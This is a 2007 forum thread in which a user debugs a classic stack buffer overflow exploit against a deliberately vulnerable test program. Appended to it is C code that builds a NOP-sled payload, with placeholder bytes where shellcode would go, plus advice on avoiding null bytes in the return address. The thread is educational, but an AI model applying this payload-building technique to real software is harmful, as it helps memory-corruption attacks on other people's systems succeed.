Author | Post |
unknown user |
I am trying to exploit the first buffer overflow vulnerable code with an exploit I wrote, which is similar to the Aleph One exploit. I filled the buffer with the return address of my shellcode and then put (buffer size)/2 NOPs and the shellcode at the beginning of the buffer. Although the buffer is 256 bytes long, I get a segmentation fault only when I run my exploit with a 500+ byte buffer. Could the program think that the buffer ends the first time it reads the return address I fill the buffer with, or is the problem something else? (If I didn't phrase my question correctly, feel free to ask me for further information, and by the way, sorry for any sloppy English.) |
|
17.07.2007 01:50:11 |
|
|
Degenerate |
Just to clarify: are you brute-forcing the number of bytes you need to fill before reaching the return address, or have you found the address and have a piece of tailored code that should cause a BOF? Either way, my experience with this is pretty limited, but that is something I couldn't work out from your post. Degen |
|
17.07.2007 08:52:46 |
|
|
unknown user |
The compiler gets to choose how much space it takes for every buffer. It usually takes alignment issues into account; off-by-one errors are common, and thus it usually reserves at least a few bytes extra. |
|
17.07.2007 09:54:31 |
|
|
unknown user |
The buffer I use looks like this: [NOP][NOP][NOP][NOP][NOP]...[SHELLCODE]....[ADDR][ADDR][ADDR]... ----------buffer size/2------------- where ADDR is the address with which I want to overflow the return address. When I compiled the vulnerable program I used -mpreferred-stack-boundary=2, which sets up the stack in double-word increments, and -fno-stack-protector to remove the protection Linux has for the stack. The problem is that it causes a segfault only when I make this buffer almost double the size of the buffer I want to overflow. So I suspected that when it reaches the first ADDR after the shellcode it assumes that the string ends, so actually my buffer's size is reduced to 1/2, with only one ADDR at the end of it. Could this be the problem? |
|
17.07.2007 10:31:36 |
|
|
unknown user |
Try compiling with -O3 or -Os; the optimizer will probably shrink the space used. |
|
17.07.2007 11:04:26 |
|
|
Degenerate |
I get the impression you know more than me, although I think your post above gives some useful info for those who know more to help you =] I'll leave you to it, and good luck! |
|
17.07.2007 11:23:25 |
|
|
unknown user |
Quote from rhican: "try compiling with -O3 or -Os the optimizer will probably shrink the space used." I tried that, but I get the same results.... Actually, I don't think the problem is with the flags I use when compiling the program, but rather that the program doesn't read all the addresses beyond the shellcode until it reaches the NULL character at the end of the buffer. It just reads the first of them and then stops. So the buffer length that is stored into the buffer is equal to buffer size/2, that is, the NOPs + the shellcode's length + 4 bytes of the first address after the shellcode. That's why I get a segfault only when I make a buffer that is almost twice the size of the buffer of the vulnerable program. But I am not very sure that this is the case, and if it is, then it is very difficult to actually make the overflow... Any suggestions appreciated. |
|
17.07.2007 11:48:55 |
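The hypothesis in the post above (that the copy stops at the first ADDR) is exactly what happens when a strcpy()-style copy meets a 0x00 byte inside the payload, and a return address such as 0xbffff500 contains one. The following added example, which is not code from this thread or from Aleph One's paper, builds an Aleph One style payload in the same way (fill the whole buffer with the address aligned to the buffer start, then overwrite the front with the NOP sled and shellcode) and measures how many bytes a NUL-terminated copy would actually transfer. The buffer size (256), sled length (128), the six placeholder "shellcode" bytes and both addresses are assumptions chosen to illustrate the point; the placeholder bytes are not real shellcode and nothing here is executed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the thread: x86 NOP opcode used for the sled. */
#define NOP 0x90

/* Placeholder "shellcode": NUL-free filler bytes (int3), not real shellcode. */
static const uint8_t sample_shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc };

/*
 * Build [NOP sled][shellcode][ADDR][ADDR]... into out[0..total).
 * Like Aleph One's exploit, the address is first written over the whole
 * buffer, little-endian and aligned to the buffer start, and the sled
 * plus shellcode then overwrite the front. Returns total, or 0 if the
 * sled and shellcode do not fit.
 */
size_t build_payload(uint8_t *out, size_t total, size_t sled_len,
                     const uint8_t *sc, size_t sc_len, uint32_t addr)
{
    if (sled_len + sc_len > total)
        return 0;
    for (size_t i = 0; i < total; i++)
        out[i] = (uint8_t)(addr >> (8 * (i % 4)));   /* little-endian bytes */
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, sc, sc_len);
    return total;
}

/* Number of bytes strcpy() would copy: everything before the first 0x00. */
size_t effective_len(const uint8_t *buf, size_t total)
{
    size_t n = 0;
    while (n < total && buf[n] != 0)
        n++;
    return n;
}

/*
 * Assumed layout from the thread: 256-byte payload, NOP sled of
 * buffer size / 2, then the placeholder shellcode, then ADDR repeated.
 * Returns how much of it a NUL-terminated copy would actually deliver.
 */
size_t copied_len_for(uint32_t addr)
{
    uint8_t payload[256];
    size_t total = build_payload(payload, sizeof payload, 128,
                                 sample_shellcode, sizeof sample_shellcode, addr);
    return effective_len(payload, total);
}

int main(void)
{
    /* 0xbffff5a4 has no zero byte: the whole 256 bytes get copied. */
    printf("addr 0xbffff5a4: %zu of 256 bytes copied\n", copied_len_for(0xbffff5a4));
    /* 0xbffff500 is stored as 00 f5 ff bf: the copy stops at the first
       ADDR, at offset 136 (128 sled + 6 shellcode, rounded up to 4). */
    printf("addr 0xbffff500: %zu of 256 bytes copied\n", copied_len_for(0xbffff500));
    return 0;
}
```

If the second case is what the vulnerable program sees, the saved return address is never reached with a 256-byte payload, which matches the symptom of needing roughly twice the buffer size before anything crashes. The check to make before sending a payload is therefore that no byte of the sled, the shellcode or the little-endian address is 0x00; if the address unavoidably contains one, pick a different landing point inside the NOP sled so that all four bytes are non-zero.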
|